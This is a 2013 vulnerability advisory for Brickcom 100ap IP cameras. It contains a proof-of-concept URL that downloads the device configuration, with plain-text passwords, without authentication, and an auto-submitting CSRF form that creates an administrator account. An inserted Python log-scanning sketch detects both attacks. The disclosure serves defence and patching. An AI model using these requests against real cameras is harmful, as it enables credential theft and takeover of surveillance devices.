Brickcom 100ap Series Authentication Bypass / CSRF
Posted Jun 13, 2013
Authored by Javier Repiso Sanchez, Eliezer Varad Lopez, Jonas Rapero Castillo

Brickcom 100ap Series IP cameras suffer from authentication bypass and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, bypass, csrf
advisories | CVE-2013-3689, CVE-2013-3690
SHA-256 | d7701a35ff508516595ba457e8080c4cc4d6d2153918179e97536a7ee0671226

============================================================================
BRICKCOM
============================================================================

1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date last updated: 12/06/2013

2.Vulnerability Description
Multiple vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues (CWE-592) and Clear Text Storage of Sensitive Information (CWE-312)
-CVE-2013-3690. Cross Site Request Forgery (CWE-352), Permissions, Privileges, and Access Control (CWE-264) and Execution with Unnecessary Privileges (CWE-250)

3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It is possible that other models are affected, but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmware versions: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In the following firmware versions you need to be logged in as administrator to download this file, but the information is still in plain text: firmwareVersion=v3.1.0.8, v3.1.0.4
-CVE-2013-3690.
All firmware versions checked are affected.

4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689: This allows you to download the entire device configuration file by requesting the following URL (all data shown will be in plain text). No authentication is necessary.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________

The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***

4.2.Cross Site Request Forgery (CSRF) + Privilege Escalation
CVE-2013-3690: CSRF is possible via the POST method.
Privilege escalation from a viewer user to an administrator user is also possible.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can attempt targeted attacks by sending a specially crafted CSRF vector. This allows manipulation of web interface parameters.
The following request can exploit this vulnerability:
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
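
Detection sketch for both issues in section 4, as an added example that is not part of the original advisory. It assumes a reverse proxy in front of the camera writes combined-format access logs; the log lines, addresses and finding labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: combined log format (src, ident, user, time, request, status, bytes, referer).
LINE = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

SAMPLE_LOG = [  # constructed lines, documentation addresses only
    '198.51.100.7 - - [13/Jun/2013:10:00:01 +0000] "GET /configfile.dump?action=get HTTP/1.1" 200 18234 "-" "curl/7.29"',
    '192.0.2.50 - admin [13/Jun/2013:10:05:00 +0000] "GET /configfile.dump?action=get HTTP/1.1" 200 18234 "http://192.0.2.10/" "Mozilla/5.0"',
    '192.0.2.50 - viewer [13/Jun/2013:10:06:00 +0000] "POST /cgi-bin/users.cgi HTTP/1.1" 200 120 "http://example.net/page.html" "Mozilla/5.0"',
    '192.0.2.50 - admin [13/Jun/2013:10:07:00 +0000] "POST /cgi-bin/users.cgi HTTP/1.1" 200 120 "http://192.0.2.10/" "Mozilla/5.0"',
]

def classify(line, camera_hosts):
    """Return a finding label for one access-log line, or None."""
    m = LINE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    if (m["method"] == "GET" and path == "/configfile.dump"
            and parse_qs(url.query).get("action") == ["get"]):
        # CVE-2013-3689: dump served although no user authenticated
        if m["user"] == "-" and m["status"] == "200":
            return "unauthenticated-config-dump"
        return "config-dump-download"  # authenticated, but contents are still plain text
    if m["method"] == "POST" and path == "/cgi-bin/users.cgi":
        # CVE-2013-3690: POST body is not logged, so key on a missing or foreign Referer
        ref_host = urlsplit(m["referer"]).hostname
        if ref_host not in camera_hosts:
            return "cross-origin-user-change"
    return None

def scan(lines, camera_hosts):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(i, f) for i, l in enumerate(lines, 1) if (f := classify(l, camera_hosts))]

if __name__ == "__main__":
    for n, finding in scan(SAMPLE_LOG, {"192.0.2.10"}):
        print(n, finding)
```

Pass the set of hostnames or addresses under which the camera's own web interface is reached as camera_hosts; any account change whose Referer falls outside that set should be reviewed against the device's user list.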

5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: The student team notifies Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers that it agrees with some of the vulnerabilities, but thinks some of them are not correct.
(CVE-2013-3689, authentication bypass and plain text information: after talking with the vendor, it looks like this bug is fixed after firmware 3.1.x.x, but the information is still shown in plain text, so they should fix this second issue.)
-2013-06-03: The students check and communicate to Brickcom the detailed products and firmware versions affected by the vulnerabilities.
-2013-06-04: The vendor agrees with everything stated and reports that it will fix it as soon as possible.